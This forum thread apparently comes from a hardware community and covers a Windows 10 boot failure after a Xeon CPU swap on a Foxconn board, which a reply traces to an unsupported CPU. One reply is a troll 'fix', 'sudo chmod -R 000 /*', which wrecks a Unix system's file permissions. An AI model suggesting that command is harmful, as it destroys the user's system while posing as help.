Installed a new CPU, now I can't boot into windows.

DaltonM

So my boot up screen shows my new CPU, it understands what's in there. But when I get past it, I get to the Windows 10 loading screen, but after that it BSODs. 

It gives me Inaccessible boot device. So I unplug all other sata devices and set the boot priority to my SSD (which has my OS on it) and of course it's all set up correctly. 

Should I reinstall windows 7? It's the only thing I have, I guess I could reupgrade to 10 afterwards. 

Is there any other way to fix this issue? I was under the impression windows would just work with my new CPU but apparently not :(

Thanks guys. 

CPU?

Is your BIOS updated?

I got a Xeon E3 1225.

There is a new bios available, but the download link at my manufacturer's website is broken... Thanks Foxconn. But the Bios I am running is newer than my CPU, and the second to newest version.

Update bios

Reset Bios

Cut the Power and pull CMOS battery out for a minute or two to force reset if you need.

System specs
  • Graphics card: Asus GTX 980 Ti (Temp target: 60c, fan speed: slow as hell)
  • CPU: Intel 6700k @ 4.2Ghz
  • CPU Heatsink: ThermalRight Silver Arrow Extreme
  • Motherboard: Asus Maximus Viii Gene
  • Ram: 8GB of DDR4 @ 3000Mhz
  • Headphone source: O2 + Odac 
  • Mic input: Creative X-Fi Titanium HD
  • Case: Fractal Design Arc midi R2
  • Boot Drive: Samsung 840 Pro 128GB 
  • Storage: Seagate SSHD 2TB
  • PSU: Be quiet! Dark Power Pro 550w

Peripherals

• Monitor: Asus ROG Swift PG278Q
  • Mouse: Razer DeathAdder Chroma (16.5 inch/360)
  • Mouse surface: Mionix Sargas 900
  • Tablet: Wacom Intuos Pen
  • Keyboard: Filco Majestouch Ninja, MX Brown, Ten Keyless 
  • Headphones: AKG K7xx
  • IEMs: BrainWavs S1

I got a Xeon E3 1225.

There is a new bios available, but the download link at my manufacturer's website is broken... Thanks Foxconn. But the Bios I am running is newer than my CPU, and the second to newest version.

Oh, Foxconn board and a xeon, that doesn't sound right, I bet Foxxcon's motherboard wont support the xeon or something.

Foxconn are known for making sub standard motherboards.

Although I don't see why they cant support the xeon still, maybe you'll have to manually set voltages or something like that.

System specs
  • Graphics card: Asus GTX 980 Ti (Temp target: 60c, fan speed: slow as hell)
  • CPU: Intel 6700k @ 4.2Ghz
  • CPU Heatsink: ThermalRight Silver Arrow Extreme
  • Motherboard: Asus Maximus Viii Gene
  • Ram: 8GB of DDR4 @ 3000Mhz
  • Headphone source: O2 + Odac 
  • Mic input: Creative X-Fi Titanium HD
  • Case: Fractal Design Arc midi R2
  • Boot Drive: Samsung 840 Pro 128GB 
  • Storage: Seagate SSHD 2TB
  • PSU: Be quiet! Dark Power Pro 550w

Peripherals

• Monitor: Asus ROG Swift PG278Q
  • Mouse: Razer DeathAdder Chroma (16.5 inch/360)
  • Mouse surface: Mionix Sargas 900
  • Tablet: Wacom Intuos Pen
  • Keyboard: Filco Majestouch Ninja, MX Brown, Ten Keyless 
  • Headphones: AKG K7xx
  • IEMs: BrainWavs S1

It's the right socket type and it's recognized in the 'bios screen' 

I figured that it wouldn't be if it was incompatible. It seems almost to be a problem with windows because of the nature of the error I am getting.

I really hope that they're compatible because my dual core CPU was the worst :(

We're going to need full specs before we even attempt to suggest a solution (unless you didn't seat it properly).

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

bring home a computer technician and ask him to teach you how to troubleshoot such issues just to be sure and safe

Maybee format the pc? my friend couldnt boot into windows when he got his gpu...he just formatted it.and it all worked.

Dont know if it would work with CPU

CPU - Intel core i7 4790K @ 4.00Ghz | GPU - MSI GTX970 G4 4GB | RAM - Corsair 16GB LP @ 1600Mhz | MOBO - MSI Gaming 5 Z97

HHDs - WD blue 1TB, Toshiba 500GB, Samsung 240GB(ssd) | Case - NZXT H440 | Cooler - NZXT kraken x61(soon) | PSU - Corsair RM 850W

Monitors - 2x BenQ RL2455HM | Headset - Steel Series Siberia Elite prism | MouseSteel Series Rivals | Keyboard - Steel Series Apex M800

bring home a computer technician and ask him to teach you how to troubleshoot such issues just to be sure and safe

I don't want to pay anyone lol. But I feel computer savvy enough to tackle this issue myself, but of course I want to seek guidance before I take action.

Maybee format the pc? my friend couldnt boot into windows when he got his gpu...he just formatted it.and it all worked.

Dont know if it would work with CPU

I want to avoid this as I don't wanna download all my games again lol and there's like 8 pictures there I wanna keep hahahha. 

I would try to let windows repair itself if I had a copy of windows 10 :(

I don't want to pay anyone lol. But I feel computer savvy enough to tackle this issue myself, but of course I want to seek guidance before I take action.

I want to avoid this as I don't wanna download all my games again lol and there's like 8 pictures there I wanna keep hahahha. 

I would try to let windows repair itself if I had a copy of windows 10 :(

any computer tech geeks/friends will do, doesn't really required to be an engineer 

I heard that windows 10 needs to be re activated if you change ANY piece of hardware. But not being able boot up in the first place makes re activation rather difficult...

That is depressing news. My copy of windows came from who knows where and I have to protect it with my life because once I loose this activation, I'm basically screwed. I don't have a key or anything. 

any computer tech geeks/friends will do, doesn't really required to be an engineer 

Yeah the worst part of that is that I am the most computer savvy person I know. 

Do you have ALL hard drives plugged in EXACTLY where they used to be? When you install and OS onto one drive, its stupid and makes all the other drives mandatory to boot up correctly.

No... I just unplugged my HDD and kept my SSD in the same sata port. I will try this for sure. 

That is depressing news. My copy of windows came from who knows where and I have to protect it with my life because once I loose this activation, I'm basically screwed. I don't have a key or anything. 

Yeah the worst part of that is that I am the most computer savvy person I know.

Its only for the free upgrade though.

I heard that windows 10 needs to be re activated if you change ANY piece of hardware. But not being able boot up in the first place makes re activation rather difficult...

you only need to reactivate it if you change the motherboard

nothing else

NEW PC build: Blank Heaven   minimalist white and black PC     Old S340 build log "White Heaven"        The "LIGHTCANON" flashlight build log        Project AntiRoll (prototype)        Custom speaker project

Spoiler

Ryzen 3950X | AMD Vega Frontier Edition | ASUS X570 Pro WS | Corsair Vengeance LPX 64GB | NZXT H500 | Seasonic Prime Fanless TX-700 | Custom loop | Coolermaster SK630 White | Logitech MX Master 2S | Samsung 980 Pro 1TB + 970 Pro 512GB | Samsung 58" 4k TV | Scarlett 2i4 | 2x AT2020

that's probably a compatibility issue just like the ones i've read on newegg like an old amd chips having a lot of issues with windows 8 and newer versions of windows

Isnt there an option where it just reverts the settings and keeps the files?

CPU - Intel core i7 4790K @ 4.00Ghz | GPU - MSI GTX970 G4 4GB | RAM - Corsair 16GB LP @ 1600Mhz | MOBO - MSI Gaming 5 Z97

HHDs - WD blue 1TB, Toshiba 500GB, Samsung 240GB(ssd) | Case - NZXT H440 | Cooler - NZXT kraken x61(soon) | PSU - Corsair RM 850W

Monitors - 2x BenQ RL2455HM | Headset - Steel Series Siberia Elite prism | MouseSteel Series Rivals | Keyboard - Steel Series Apex M800

Easeus Partition master free home edition

after transffering most free space from drive D to drive c(windows installed) , system restore cannot be enabled and permanently turned-off and some missing errors appearing on drive-C when i check system protection; will windows repair install fix this??

Isnt there an option where it just reverts the settings and keeps the files?

if i remember there's a way to set everything to its default setting on the bios; check youtube bcoz i've already forgotten about it

-snip-

A quick google search on Foxconn h67s cpu compatibility gave me this

http://www.foxconnsupport.com/cpusupportlist.aspx?type=mb&socket=Socket+1155&model=H67S&cputype=Intel

and there is no xeons in that list.

CPU: r7 2700x;  GPU: EVGA GTX 980 ti sli; RAM: 16GB DDR4; MoBo: ASUS CH VII HERO x470; PSU: Seasonic Prime 850 Titanium; Case: Be Quiet! Dark Base 900 PRO; SSD: Kingston 120 GB; HDD: 1x 500 GB 1x 2TB 1x 3TB;

My Anime List 300+ completed

A quick google search on Foxconn h67s cpu compatibility gave me this

http://www.foxconnsupport.com/cpusupportlist.aspx?type=mb&socket=Socket+1155&model=H67S&cputype=Intel

and there is no xeons in that list.

hhnnnggghhhhhhh

my heart!!!!

Okay...  :(

I will reinstall windows anyway and see if I can get it working... but this wrecks my life. Getting this CPU saved me over $200 but I guess I'll have to upgrade anyway...

Thanks guys.